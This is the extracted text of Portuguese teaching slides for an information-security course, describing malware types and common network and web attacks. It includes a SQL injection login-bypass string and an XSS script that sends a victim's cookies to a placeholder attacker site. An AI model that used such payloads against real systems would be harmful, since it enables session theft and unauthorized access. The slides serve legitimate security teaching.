Técnico de Manutenção e Suporte em Informática Disciplina - Segurança da InformaçãoUnidade 2 – Malwares e Ataques mais comuns

Prof. Leandro Cavalcanti de Almeidalcavalcanti.almeida@gmail.com

@leandrocalmeida

Malwares

Vírus Bot

Worms Rootkits

Backdoors

Spywares

Cavalode

Tróia

Keylogger

Malwares = Software Maliciosos

Vírus

VírusTrecho de código, geralmente em assembler, que é injetado dentro de outro aplicativo

Modo de Operação: necessidade de um código hospedeiro para sobreviver e replicar. Necessita da ação do usuário

KeyloggerAplicativo voltado para capturar tudo o que se é digitado no teclado

Modo de Operação: aplicativo captura tudo que é digitado e envia de tempos em tempos para o atacante

Keylogger

WormAplicativo que realiza escaneamentos na rede em busca de hosts vulneráveis. Não necessita da ação do usuário

Modo de Operação: Se instala e replica entre hosts na rede de forma cíclica

Worms

BotRobô, que possui funcionalidades de worms, e fica aguardando a ordem do seu mestre para realizar ataques a outros computadores

Modo de Operação: Após o comando do mestre realiza um DoS em algum outro host na rede

Bot

RootKitAplicativo que têm como finalidade permitir acesso privilegiado a um invasor, escondendo seus rastros

Modo de Operação: Geralmente se camufla em outros processos do sistema e abre uma backdoor para acessos remotos não autorizados

Rootkits

BackdoorAplicativo que têm como finalidade permitir acesso remoto através da abertura não autorizada de uma porta

Modo de Operação: Geralmente habilitam uma porta alta para acessos não autorizados

Backdoors

SpywaresAplicativo que têm como finalidade coletar informações estatísticas dos hosts e enviá-las ao atacante

Modo de Operação: Monitoram processos e conexões de rede e enviam essas informações so atacante

Spywares

Cavalo de TróiaPresente de grego camuflado em arquivos como fotos, cartões virtuas, jogos,... que tem funções destrutivas

Modo de Operação: após a vítima baixar o “presente” o trojan instala outro Malware

Cavalode

Tróia

Aplicação

Transporte

Rede

Enlace

Físico

AtaquesSql Injection XSS

Buffer OverflowTCP SYN FLOOD UDP FLOOD

Main in the Middle

IP Spoofing ICMP Flooding

ARP Spoofing

MAC Spoofing

STP Attack

ARP Poisoning

SQL InjectionEx : Sistema de autenticação em PHP

Imagine se o usuário inserir os dados abaixo...Login: qualquer coisaSenha: ' OR '1'='1

SELECT * FROM usuarios WHERE login='qualquer coisa' AND senha = '' OR '1'='1'

Essa query SQL retornará todos os registros da tabela usuários!

XSS Suposição:Facebook vulnerável a Cross-Site Scripting

Insere um código(html, Javascript,...) malicioso no lugar de um post na base de dados do facebook

Usuário ingênuo clica no link...

<script>Document.location = 'http://sitedocracker.com/roubarcokkies.php=' + document.cookie

</script>

Buffer Overflow

<script>Document.location = 'http://sitedocracker.com/roubarcokkies.php=' + document.cookie

</script>

char nome[4]; int idade;

L E O \0 2 0Entrada: LEO idade: 20

char nome[4]; int idade;

L E O A \0Entrada: LEOOA idade: 65

O

TCP SYN FLOOD

SYN

SYN-ACK

ACK

SYN

SYNSYNSYNSYNSYN

UDP FLOOD

UDP – porta qualquer

UDP – porta qualquer

UDP – porta qualquer

UDP – porta qualquer

UDP – porta qualquer

UDP – porta qualquer

Main in the Middle

Packet

Packet

Packet

Packet

IP Spoofing Packet

10.0.0.1

10.0.0.254

10.0.0.1

Packet

Packet

Packet

Packet

Atacante envia pacotes IP falsificados para a vítima, se passando por outro host na rede!

Packet

ICMP Flooding

ICMP – echo request

ICMP – echo request

ICMP – echo request

ICMP – echo request

ICMP – echo request

ICMP – echo request

Spanning Tree Attack

VLAN 1

VLAN 1

VLAN 2VLAN 1 VLAN 2VLAN 3

VLAN 1VLAN 2

Packet

PacketPacketPacket

Packet

Packet

Packet

Packet

PacketPacketPacketPacketPacket

Atacante se torna Root bridge

ARP SpoofingPacket

IP: 10.0.0.1MAC: 68:A3:C4:9B:73:54

IP: 10.0.0.254MAC: 52:54:00:69:42:4A

IP: 10.0.0.2MAC:68:A3:C4:9B:73:54

Packet

Packet

Packet

Packet

Atacante envia pacotes ARP falsificados para a vítima, se passando por outro host na rede!

Packet

arpspoof

ARP Poisoning

IP: 10.0.0.1MAC:68:A3:C4:9B:73:54

IP: 10.0.0.254MAC: 52:54:00:69:42:4A

IP: 10.0.0.2MAC: 68:A3:C4:9B:73:54

Packet

1 MAC2 MAC3 MAC4 MAC5 MAC6 MAC

Atacante envenena a tabela ARP do Switch

MAC Spoofing Packet

68:A3:C4:9B:73:54

52:54:00:69:42:4A

68:A3:C4:9B:73:54

Packet

Packet

Packet

Packet

Atacante envia pacotes com endereço MAC falsificado para a vítima, se passando por outro host na rede!